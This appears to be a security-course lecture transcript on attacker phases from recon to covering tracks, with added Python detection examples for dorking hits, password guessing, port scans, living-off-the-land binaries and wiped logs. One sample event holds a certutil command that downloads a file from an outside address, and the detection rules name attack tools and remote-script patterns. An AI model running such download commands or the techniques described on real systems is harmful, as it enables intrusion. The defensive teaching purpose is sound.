In this section, we're going to talk about hacker tactics, techniques, and procedures. These are the phases an attacker goes through when they're attempting to hack into an organization. The reason it matters is that at each phase, as a defender, there are certain things you can look for to help you identify what may be going on. At a high level, the attack methodology is broken down into five phases. Now, these phase names may change, or there may be more phases. There may be six phases, or they may be condensed down to four, depending on the organization or training institution whose framework you're dealing with. But generally speaking, they follow the same basic guidelines: recon; information gathering, which is very similar but different enough for our purposes; gaining access; maintaining access and pivoting; and covering tracks.

Recon is the first step in our attack cycle. We're going to gather as much information as possible about our target. There are generally three groups of information we're concerned about: the network, the hosts, and the people involved with our target organization. There are two types of recon we can do. Active recon is recon where we interact with our target directly. Passive recon is where we interact with third-party entities that also have information about our target. We're going to split those into two separate categories. When we talk about passive recon, we're talking about, say, going to Google and googling my target. Let's say I'm attempting to hack into EC-Council. I could throw EC-Council into Google, see what information is there about them, and EC-Council won't know that I've been doing that. I didn't send any traffic to EC-Council.
Now, I can probably find phone numbers for EC-Council. If I start calling those phone numbers, that's where we cross into active recon. The idea is that I directly interacted with the target. The difference is that in the passive area of recon, defenders can't really do anything to stop it or identify when passive recon is taking place, because I'm not interacting with them directly. There are no logs that they get. They can attempt to lessen their footprint by reducing the amount of information that's publicly available and making sure they don't release anything to the public they don't intend to. It's very common for organizations to have issues with the security levels on their documentation, and sometimes that information gets leaked, or they'll have certain types of websites exposed that should not be exposed.

There are a lot of passive tools we can use. Google is the biggest one. You can use a process called Google Dorking to be very specific in your search queries and identify things you normally wouldn't be able to find. There are other things like Shodan, which is a searchable database like Google, but for internet-connected devices. Shodan has already done the fingerprinting for us: it tells us what versions of a device are out there, what services are running on it, what the IP space is, things of that nature.

Now, in the active category, this is where we start directly interacting with the target. If we're talking about a phone, for example, we gathered the phone number in the passive phase. If we start calling that organization, we move into the active phase. Now the organization has a call log, or we've talked to a receptionist and asked them questions. Now the organization has something they've seen that they can use to start tracking down our identity or location, or to help stop us in the future.
If you call an organization and get the receptionist on the phone, and you start asking potentially sensitive questions about their infrastructure, like how many security guards are in the building, that may raise the security level of the organization and raise some red flags for them. Same thing if we start poking at their applications or websites. If we start querying them, they'll start seeing entries in their web server logs.

What we want to do now is jump over to some of these tools and show you how they work on the passive side. We're not really going to do anything active. We talked about Google Dorking, and there is a site called Exploit-DB.com. Exploit DB is a place where people can go and contribute their custom-built Google Dorks. You can see a lot of them here and when they were added, and there are things added all the time, as you can see. The reason this matters is that as applications are added to the internet, or as people identify different combinations of keywords they can use, it changes what you can find. You can see there are 6,000 different Google Dorks in this database, and there are more dorks you can come up with on your own. What we're going to do is click on one of these. We're just going to use phpmyadmin/user. We're going to open it up in another tab. On the right here, you can see the category, what kind of things it would give you, so "files containing juicy info", and the author who contributed it. Within Exploit-DB there are also various shellcodes available, so these are actual payloads that you could drop onto a target system, as well as papers and exploits. The way these fit together is that you'd use an exploit to get onto the system, and maybe use some shellcode there to drop a payload for post-exploitation purposes.
Exploit DB is a great resource for attackers, but right now we're interested in the Google Hacking Database, the GHDB. We right-click on our phpmyadmin/user dork and open it in the next tab. All it does, as you can see here in the Google search bar, is say: for any URL, look for this string, phpmyadmin/user_password.php. You can see there's a fair amount of them, three pages' worth. These are going to be the phpmyadmin login interfaces for those organizations. You can see we've got some other organizations up here, and with phpmyadmin, if you're able to log in, especially as an authenticated user, there's a fair amount of damage you can do, information you can gain, and things you can change on a target website. If we open up this link here, you can see we're now at the phpmyadmin login portal. Now, this is as far as we can go. This is open; we haven't done anything as far as attacking this target yet, but we have become active, because we did visit this site. If they look at their web logs, they will be able to see there was a visitor to this application. If we start guessing passwords, that can be considered an attack, and that would be illegal for us to do. However, if we were a malicious attacker, that's exactly what we'd probably start doing. We'd probably do some more open-source recon to look for more information about this organization and come up with some potential usernames and passwords. We would also guess default credentials or generally run a password [inaudible] against this page in an attempt to log in.

The other thing I want to show you is Shodan. You go to Shodan.io. This is a database of internet-connected devices. This is a totally legal website to use. Now, there's a certain point where accessing systems that you don't have explicit permission to access becomes illegal, but for now we can look at it.
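The point above is that the first visit to the phpmyadmin page is where the attacker becomes visible, and password guessing becomes visible as a burst of login POSTs. The following is an added example, not code from the original lecture: a small parser for web-server access logs in the common "combined" format that pulls out hits on admin interfaces, hits that arrived from a search-engine referrer (the dorking case), and source IPs that hammer the login page. The log lines, the IP addresses, the path list and the thresholds are all constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access log (Apache/Nginx "combined" format). These lines are
# made up for the example; 203.0.113.0/24 and 198.51.100.0/24 are documentation
# address ranges, not real visitors.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2024:13:50:12 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:13:55:01 +0000] "GET /phpmyadmin/user_password.php HTTP/1.1" 200 2319 "https://www.google.com/search?q=inurl:phpmyadmin" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:13:55:09 +0000] "POST /phpmyadmin/index.php HTTP/1.1" 200 1942 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:13:55:11 +0000] "POST /phpmyadmin/index.php HTTP/1.1" 200 1942 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:13:55:12 +0000] "POST /phpmyadmin/index.php HTTP/1.1" 200 1942 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:13:55:14 +0000] "POST /phpmyadmin/index.php HTTP/1.1" 200 1942 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:13:55:15 +0000] "POST /phpmyadmin/index.php HTTP/1.1" 200 1942 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:13:55:17 +0000] "POST /phpmyadmin/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2024:14:02:40 +0000] "POST /phpmyadmin/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# One combined-format line: ip ident user [ts] "method path proto" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Assumed list of admin interfaces worth watching; adjust to what your site actually exposes.
SENSITIVE_PREFIXES = ("/phpmyadmin/", "/wp-admin/", "/admin/")


def parse_log(text):
    """Parse combined-format lines into dicts; lines that don't match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ev["status"] = int(ev["status"])
        events.append(ev)
    return events


def admin_panel_hits(events, prefixes=SENSITIVE_PREFIXES):
    """Every request that touched an admin interface: the moment passive recon
    turns active and the defender first gets a log line to look at."""
    return [ev for ev in events if ev["path"].startswith(prefixes)]


def search_engine_referrals(events, prefixes=SENSITIVE_PREFIXES):
    """Admin-panel hits whose Referer is a search engine. A real admin bookmarks the
    page; someone arriving from a search result most likely found it by dorking."""
    return [ev for ev in admin_panel_hits(events, prefixes)
            if "google." in ev["referer"] or "bing." in ev["referer"]]


def login_bursts(events, login_path, threshold=5, window=timedelta(seconds=60)):
    """Source IPs that POST to the login page at least `threshold` times within any
    `window` (sliding), i.e. password guessing. Returns {ip: total_login_posts}."""
    posts = defaultdict(list)
    for ev in events:
        if ev["method"] == "POST" and ev["path"] == login_path:
            posts[ev["ip"]].append(ev["ts"])
    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for ev in search_engine_referrals(evs):
        print(f"search-engine referral to admin page: {ev['ip']} -> {ev['path']} via {ev['referer']}")
    for ip, n in login_bursts(evs, "/phpmyadmin/index.php").items():
        print(f"possible password guessing: {ip} made {n} login POSTs")
```

Note that the status code is deliberately not used to decide what counts as a failed login: many login pages, phpMyAdmin included, re-render the form with a 200 on failure, so rate alone is the more reliable signal.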
Once you get to Shodan and go to Explore, you'll see it has some categories you can go to, and the big thing here is internet-connected webcams and security cameras. Cameras with default credentials; you see "admin" here. If we click on one of these webcam ones, it gives us a list of all the webcams. Now, if we start clicking on these, that's where we run into issues of possibly accessing one of those systems. You see "honeypot"; they've got different tags on them, and you can see the locations they're at and how many of them there are. You can see what services are running. You can see the organizations, the products, a bunch of information there. You can also go back to the home page and do a broader search. We just clicked on one of the built-in Explore queries. But if we wanted to search for, let's say, http, this should show us a list of all the HTTP systems connected to the internet. That's a pretty large list; it should be in the millions, I would expect. Shodan is fairly cheap. It has a free version and a paid version. The free version has some of the things you can do and a limited number of queries you can make. The paid version is fairly cheap, and even cheaper during some of the major sales they do. You can see there are millions and millions of HTTP servers, which we expected. What's important to take away here is that it gives us this footprint. If we take this one here, it gives us the internet provider, the location, and the technologies used on that web server if we were to go there. It tells us some general header information we can use. This again is very valuable information to an attacker, but it's also passive. This organization has no idea that we've now seen this information.

The next phase is information gathering and scanning. I like to keep this as a separate phase from the first phase because I feel that at this point, we start to raise a lot more flags for defenders.
This is where, as an attacker, we're starting to get down to the meat and bones. This is also a cyclical process. Here, what we're going to do is start scanning and fingerprinting hosts and their services. There are three types of scans that are generally involved. There's port scanning. This involves scanning the target for information like open ports, live systems, and the various services running on the host. There are lots of tools that can be used for this. The most common, and the one that's used by everybody all the time, is Nmap. The next type of scanning you'll see a lot is vulnerability scanning. Once we identify a host using our port scanning, we then run a vulnerability scan on it. Vulnerability scans check the target for weaknesses that can be exploited, and this is usually done with the help of automated tools. Now, in real-world attacks, generally speaking, you don't see many vulnerability scanners being run. They're very noisy, they create a lot of alerts that the defender can easily identify, not to mention that the vulnerability scanner is presumably only going to have unauthenticated access at this point, and generally speaking there aren't too many things you're going to identify with a vulnerability scanner from an unauthenticated point of view that you don't identify very easily from the port scanning point of view. When we do our port scanning and check for ports and services running, if we're using Nmap, we can check the versions of those services. Once we have that information, we can do some research to identify whether those versions have any common, publicly known exploits available, or whether there are misconfigurations in the services. Vulnerability scanning, while it's something we would definitely do during a penetration test, is not something we see very often during a real-world attack. Network mapping. Again, this is very similar to port scanning.
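Port scanning is noisy precisely because one source touches many ports on one host in a short time, most of them closed. The following is an added example, not code from the original lecture, showing the detection side of that: it reads a constructed connection log (the shape you would get from a firewall export or a Zeek conn.log converted to CSV) and flags source/destination pairs where a single source hits many distinct ports within a short window, reporting how many of those attempts were rejected. The log rows, the addresses and the thresholds are all made up for the example.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed connection log, one row per TCP connection attempt. Made up for this
# example: 10.0.0.21 sweeps twelve ports on 10.0.0.50 in three seconds, while
# 10.0.0.33 behaves like a normal client.
SAMPLE_CONN_LOG = """\
ts,src,dst,dport,outcome
2024-03-10T13:10:00,10.0.0.33,10.0.0.50,443,accepted
2024-03-10T13:20:00,10.0.0.33,10.0.0.51,445,accepted
2024-03-10T13:50:00,10.0.0.33,10.0.0.50,80,accepted
2024-03-10T14:00:00,10.0.0.21,10.0.0.50,21,rejected
2024-03-10T14:00:00,10.0.0.21,10.0.0.50,22,accepted
2024-03-10T14:00:00,10.0.0.21,10.0.0.50,23,rejected
2024-03-10T14:00:01,10.0.0.21,10.0.0.50,25,rejected
2024-03-10T14:00:01,10.0.0.21,10.0.0.50,80,accepted
2024-03-10T14:00:01,10.0.0.21,10.0.0.50,110,rejected
2024-03-10T14:00:02,10.0.0.21,10.0.0.50,135,rejected
2024-03-10T14:00:02,10.0.0.21,10.0.0.50,139,rejected
2024-03-10T14:00:02,10.0.0.21,10.0.0.50,143,rejected
2024-03-10T14:00:03,10.0.0.21,10.0.0.50,443,accepted
2024-03-10T14:00:03,10.0.0.21,10.0.0.50,445,rejected
2024-03-10T14:00:03,10.0.0.21,10.0.0.50,3389,rejected
"""


def parse_conn_log(text):
    """Turn the CSV export into a list of typed rows."""
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        rows.append({
            "ts": datetime.fromisoformat(r["ts"]),
            "src": r["src"],
            "dst": r["dst"],
            "dport": int(r["dport"]),
            "outcome": r["outcome"],
        })
    return rows


def detect_port_scans(rows, min_ports=10, window=timedelta(seconds=30)):
    """Flag (src, dst) pairs where one source touches at least `min_ports` distinct
    destination ports within `window`. The rejected count is reported because a
    scanner, unlike a real client, mostly hits closed ports."""
    by_pair = defaultdict(list)
    for r in rows:
        by_pair[(r["src"], r["dst"])].append(r)

    findings = []
    for (src, dst), events in by_pair.items():
        events.sort(key=lambda r: r["ts"])
        for i, first in enumerate(events):
            in_window = [e for e in events[i:] if e["ts"] - first["ts"] <= window]
            ports = {e["dport"] for e in in_window}
            if len(ports) >= min_ports:
                rejected = sum(1 for e in in_window if e["outcome"] == "rejected")
                findings.append({
                    "src": src, "dst": dst, "start": first["ts"],
                    "ports": sorted(ports), "rejected": rejected,
                })
                break  # one finding per pair is enough for an alert
    return findings


if __name__ == "__main__":
    for f in detect_port_scans(parse_conn_log(SAMPLE_CONN_LOG)):
        print(f"{f['src']} scanned {f['dst']}: {len(f['ports'])} ports starting "
              f"{f['start']:%H:%M:%S}, {f['rejected']} rejected")
```

The window and port-count thresholds are the tuning knobs: a slow, spread-out scan (Nmap's timing options exist for exactly that reason) slips under a 30-second window, so a second pass with a window of hours and a lower port count is the usual complement in a real detection set.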
This is where we're going to try and map out the network, and this is generally going to be by trying to get hold of any sort of network configurations, routers, firewalls, anything of that nature, to get a better lay of the land. Our overall goal in this phase is to identify a potential weak spot that we can leverage for the next phase in the attack cycle, which is our exploitation phase. Generally, that's going to happen with our first two types of scans here, port scanning and vulnerability scanning.

Gaining access, or exploitation. During this phase, the attacker attempts to gain a foothold in an organization. If you take our recon, where we found a phpmyadmin page, and we ran a brute-force login tool against it and it logged in, now we have access; we've now gotten to this phase of our attack cycle. There are a lot of tools and techniques that can be used to accomplish this. The most common exploit framework out there still today, and one of the oldest, is Metasploit. It's definitely the most popular and well-known. It has tons of different exploits built into it and different tools you can use to help you exploit machines, but there are a lot of other ones you'll hear about. The thing is, as a defender, Metasploit is very well-known and a lot of Metasploit's signatures are heavily identified by all the defender tool sets. Metasploit's common payloads like Meterpreter will immediately trigger any antivirus out there nowadays, at least the stock version of Meterpreter. You can modify things, you can do some encoding and things like that, to try and make it bypass antivirus. All that said, if the attackers are successful at gaining their initial foothold, they will probably have remote access to the system now. What happens next is going to depend on their goal.
Generally speaking, if they're trying to get into an organization, they probably have plans to extract data or pivot to further goals, whether it's to steal money, do damage, or extract data. At this point, they probably have remote access to a system, and they're going to leverage that access for the next phase of the attack cycle.

Maintaining access and pivoting. As I just mentioned, our goal during this stage depends on what we're trying to accomplish. If we're just trying to get in to prove that we can, then we've done that and we've been successful. If we now want to pivot around to get to a more sensitive part of the organization, we can start doing that. If our goal is to steal information, we can start looking for the information. If our goal is to cause damage, this is where we start to do that. If our goal is to elevate our privileges for further operations, that's also where we start doing that. What our goal is determines the types of tools we use, it affects the techniques we use going forward, and it alters some of the flags the defender is going to identify. If we're trying to elevate privileges to an administrator or domain administrator, we might initially start looking at accounts on the system we're in, we might start trying to sniff network traffic or run other tools like Responder if we can drop them onto the host, and we might start installing tools to help us gain privileges, which is very common and a big indicator for a network defender. If a host on your network all of a sudden starts installing known hacking tools like Responder, that is something that's going to be an attention grabber for you. If our goal is to pivot to another machine, or just to start reconning toward a more sensitive area of the network, we're going to start running those scans again from the previous phase.
We're going to start running Nmap again if we can, or running quick PowerShell port scanners or bash port scanners, or whatever we have in place or whatever is on the system. Depending on the sophistication of the attacker, they may not install something like that, because it is a flag for a defender. They may do what we call living off the land, and I'll show you what that looks like in a second. Once they run their network scans, if our goal was to move throughout the network, we're then going to find our next target and we have to attack it again. Now, things may be a little easier for us, because hopefully we have credentials. Maybe we captured a hash and cracked it, maybe we've gotten a ticket and we're going to replay that ticket, maybe we're just going to pass the hash to our target. But hopefully we can identify the next target on the network we want to pivot to and jump from our current host to the second host in our chain of attack.

Then we're going to attempt to install a persistence mechanism. Once we elevate privileges, once we pivot through the network, or just to ensure we're safe where we are, we install persistence mechanisms to make sure that if someone restarts their computer in the middle of our foothold, we don't lose all of our access and have to start over. A lot of times, it's going to look like a binary that starts up when the machine restarts. That's a pretty common one.

Let me show you the LOLBAS project here. This is LOLBAS, living-off-the-land binaries and scripts, and this is the newer approach to post-exploitation that a lot of attackers are using. The reason is that a lot of attack tool sets are easily identifiable. Once an attacker's tool gets into the hands of Windows Defender or Microsoft, they're going to start highlighting signatures and put those signatures into their antivirus engine.
Then when that tool is used, the antivirus engine detects it and the attacker gets caught. Living-off-the-land binaries and scripts are tools that are on your system by default and generally won't notify any defenders of their use, and they have interesting functions that can be exploited and used by an attacker to do certain things. We can see the details here. We can use the certutil command, if we're on a Windows machine, to download additional payloads from somewhere on the internet. There are all sorts of things we can do. We can write alternate data streams, application whitelist bypassing. If you want to run applications the user shouldn't be allowed to use because of their permission level, we can attempt to do that using some of these commands. Let's look at what that might look like. The application whitelist bypass runs if we just run the DL32 and give it all these flags, and give it the location of what we want to run. You can see the privileges required are just a regular user; we don't need to be an admin at this point. We can see the systems it works on by default. Now, if you were to run this, it will possibly be caught by defenses, because you'll see this thing here, MITRE, and it gives you a number. We'll talk about this in a little bit, but that's the MITRE ATT&CK framework, and this maps to a MITRE ATT&CK technique. Let me look at that and see what it says real quick: Trusted Developer Utilities Proxy Execution. We'll go over all this in a few minutes, but this is what a lot of defenders are now mapping their detection capabilities to, to help them identify what's going on when they see some of these flags. There are quite a few of these LOLBAS tools we can use, and this is just on Windows. If we want to go look at GTFOBins, we have another site, GTFOBins, with all of the things those binaries can do.
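Because living-off-the-land binaries are signed Windows components, antivirus won't flag the file; what a defender can key on instead is how the binary was invoked, and that is exactly why LOLBAS entries carry an ATT&CK technique ID. The following is an added example, not code from the lecture or the LOLBAS project, that triages constructed process-creation events (the shape Sysmon or an EDR gives you) against a handful of command-line rules: certutil used as a downloader, mshta and regsvr32 pulling remote scripts, MSBuild run on a project from a user-writable folder (the Trusted Developer Utilities Proxy Execution case mentioned above), and a known tool name such as Responder or Nmap on the command line. The events, user names and regexes are all made up for the example; the technique IDs are real MITRE ATT&CK identifiers, but the mapping of each regex to a technique is this example's own heuristic.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events in a Sysmon-like shape. Made up for this
# example, not captured from a real host; CORP\jdoe and CORP\dev1 are fictional.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.9/update.bin C:\Users\Public\update.bin",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"CORP\jdoe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\Users\jdoe\AppData\Local\Temp\build.xml",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"CORP\jdoe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.csproj /t:Build",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\devenv.exe", "User": r"CORP\dev1"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\installers\setup.msi SHA256",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"CORP\dev1"},
    {"Image": r"C:\Python39\python.exe",
     "CommandLine": r"python.exe C:\Users\Public\Responder\Responder.py -I Ethernet0",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"CORP\jdoe"},
]

# Each rule: (name, ATT&CK technique or None, regex on the image file name,
# regex on the command line). The regexes are this example's own heuristics.
RULES = [
    ("certutil used to download a file", "T1105",
     r"^certutil\.exe$", r"-urlcache|-split"),
    ("mshta launching a remote script", "T1218.005",
     r"^mshta\.exe$", r"https?://"),
    ("regsvr32 loading a scriptlet", "T1218.010",
     r"^regsvr32\.exe$", r"scrobj\.dll|/i:https?://"),
    ("MSBuild project from a user-writable path", "T1127.001",
     r"^msbuild\.exe$", r"\\(temp|appdata|downloads|public)\\"),
    ("known attack tool on the command line", None,
     r".", r"responder\.py|\bnmap\b"),
]


def triage(events, rules=RULES):
    """Match every event against every rule; a match is a finding that carries the
    user and parent process so an analyst can judge it in context."""
    findings = []
    for ev in events:
        image_name = PureWindowsPath(ev["Image"]).name
        for name, technique, image_re, cmd_re in rules:
            if (re.search(image_re, image_name, re.IGNORECASE)
                    and re.search(cmd_re, ev["CommandLine"], re.IGNORECASE)):
                findings.append({
                    "rule": name,
                    "technique": technique,
                    "user": ev["User"],
                    "parent": PureWindowsPath(ev["ParentImage"]).name,
                    "command": ev["CommandLine"],
                })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['technique'] or 'tool'}] {f['rule']}: {f['user']} via {f['parent']}\n    {f['command']}")
```

The two benign events in the sample (a developer building a project under C:\src from Visual Studio, and certutil hashing an installer) fall through every rule, which is the point of keying on arguments and paths rather than on the binary name alone: the same binaries are used legitimately all day.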
You can see with awk, A-W-K, there are lots of things we can use it for to help us elevate our privileges as an attacker.

Our final phase, we talked about covering our tracks. If we're an attacker, we did our recon and our information gathering, we scanned the target's exposed surface to find a potential place we could attack. We exploited that surface, the hole or weak spot we found, to get a foothold in the network. Once we were in the network, we built in a persistence mechanism in case we got kicked off. We also started to elevate our privileges, trying to get to admin or domain admin, and we pivoted around the network to get the information we wanted, looking for certain files or sensitive information. Now we're done. We want to leave, and we want to cover our tracks. The goal here is to not get caught and to remove any evidence that we've ever been here. Some of the ways we do that: you remove your logs. You delete malware or any binaries we installed as an attacker. We use drop sites for any of our data dumps. If we stole data, instead of bringing that data straight back to our systems, we might dump it somewhere like Pastebin, because Pastebin then acts as a proxy for us that we can fetch it from without being so easily tracked back to our home networks.

The problem with all of this, the problem with covering our tracks, is that it's very difficult to do. If we as an attacker start removing logs, the removal of those logs gets logged, and it may create a strange gap when someone looks at the logs. Say we removed all the network logs from the five minutes we were scanning the network. Well, as a defender, if you see a sudden loss of five minutes in your network logs, that's going to be a flag. If we see instances where applications are getting deleted, that's going to be a flag: what was deleted?
Some unknown binary was deleted; what was it, and why? Who deleted it? When? If the log of what was installed is deleted, it's gone, and it becomes difficult, and the attempt at covering your tracks in a way creates more tracks. We don't typically do this during a pen test or red team assessment. But for a real-world attacker, this is absolutely a technique that's used, because it's so hard to cover your tracks: we can just attempt to impersonate another organization. The reason this works is that direct attribution is very difficult. Because I as an attacker don't physically have to come to your building to break in, I can do it over the internet; I can use proxies, I can use VPN services, I can use all sorts of other tools. I can use cloud services; they hide who I really am. It's very hard to follow that trail all the way back to a specific attacker. There are Tor networks and things like that that help mask the attack location. What you'll see a lot is that organizations, if they don't want to take credit for an attack, may start putting identifiers and fingerprints in place that look like other organizations. If Russia was going to attack some organization, or APT32 was going to attack an organization, they may want to put fingerprints in place that make it look like a different APT was there, or America was here, or China was here. That way, it throws the defenders off the scent a little bit. This is something that's done quite a bit; again, because attribution is hard, it's hard to identify when it's being used, but it definitely does get used, especially at the nation-state and APT level.

Next up, we're going to talk about the MITRE ATT&CK framework in the next video. We're going to talk about how all these phases come together for the defender, what kind of detection flags you're looking for, and how to use the MITRE ATT&CK framework to map to what's going on in your network.
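The "five minutes missing from the network logs" point above is something a defender can check mechanically: a source that normally logs every half minute and then goes silent for minutes is itself the signal, and on Windows the act of clearing a log is recorded as an event of its own (Security log cleared is event ID 1102, System log cleared is event ID 104). The following is an added example, not code from the lecture, that reads a constructed log timeline, learns each source's normal cadence from the median interval between its records, flags stretches far longer than that cadence, and separately pulls out log-cleared events. The timeline lines, host names and thresholds are all made up for the example.

```python
from datetime import datetime, timedelta
from statistics import median

# Constructed log timeline: "timestamp source event_id message" per line. Made up
# for this example; fw01 normally logs about every 30 seconds, then goes quiet for
# five and a half minutes, and a workstation later reports its audit log cleared.
SAMPLE_TIMELINE = """\
2024-03-10T14:00:00 fw01 0 allow 10.0.0.21 -> 10.0.0.50:443
2024-03-10T14:00:30 fw01 0 allow 10.0.0.33 -> 10.0.0.50:80
2024-03-10T14:01:00 fw01 0 deny 10.0.0.21 -> 10.0.0.50:445
2024-03-10T14:01:30 fw01 0 allow 10.0.0.33 -> 10.0.0.51:445
2024-03-10T14:02:00 fw01 0 allow 10.0.0.21 -> 10.0.0.50:22
2024-03-10T14:07:30 fw01 0 allow 10.0.0.33 -> 10.0.0.50:443
2024-03-10T14:08:00 fw01 0 allow 10.0.0.33 -> 10.0.0.50:80
2024-03-10T14:08:05 ws17 1102 The audit log was cleared
2024-03-10T14:08:30 fw01 0 allow 10.0.0.21 -> 10.0.0.50:443
"""

# Windows event IDs that record a log being cleared: 1102 (Security), 104 (System).
LOG_CLEARED_EVENT_IDS = {1102, 104}


def parse_timeline(text):
    """Split each line into its four fields and type the timestamp and event ID."""
    records = []
    for line in text.splitlines():
        ts, source, event_id, message = line.split(maxsplit=3)
        records.append({
            "ts": datetime.fromisoformat(ts),
            "source": source,
            "event_id": int(event_id),
            "message": message,
        })
    return records


def find_gaps(records, source, factor=10, min_gap=timedelta(minutes=2)):
    """Silent stretches in one source's log that are far longer than its normal
    cadence. The threshold is max(factor * median interval, min_gap), so a chatty
    source is judged against its own rhythm and a quiet one isn't flagged for
    every pause."""
    times = sorted(r["ts"] for r in records if r["source"] == source)
    if len(times) < 3:
        return []  # not enough history to know what "normal" looks like
    intervals = [b - a for a, b in zip(times, times[1:])]
    threshold = max(median(intervals) * factor, min_gap)
    return [{"start": a, "end": b, "duration": b - a}
            for a, b in zip(times, times[1:]) if b - a > threshold]


def log_cleared(records):
    """Records that say a Windows event log was wiped: the cover-up that logs itself."""
    return [r for r in records if r["event_id"] in LOG_CLEARED_EVENT_IDS]


if __name__ == "__main__":
    recs = parse_timeline(SAMPLE_TIMELINE)
    for g in find_gaps(recs, "fw01"):
        print(f"fw01 silent for {g['duration']} between {g['start']:%H:%M:%S} and {g['end']:%H:%M:%S}")
    for r in log_cleared(recs):
        print(f"{r['source']} at {r['ts']:%H:%M:%S}: event {r['event_id']} ({r['message']})")
```

In practice the gap check is most useful when the logs are shipped off the host to a collector the attacker can't reach, because then a gap can only mean the source stopped sending, which is itself worth a ticket.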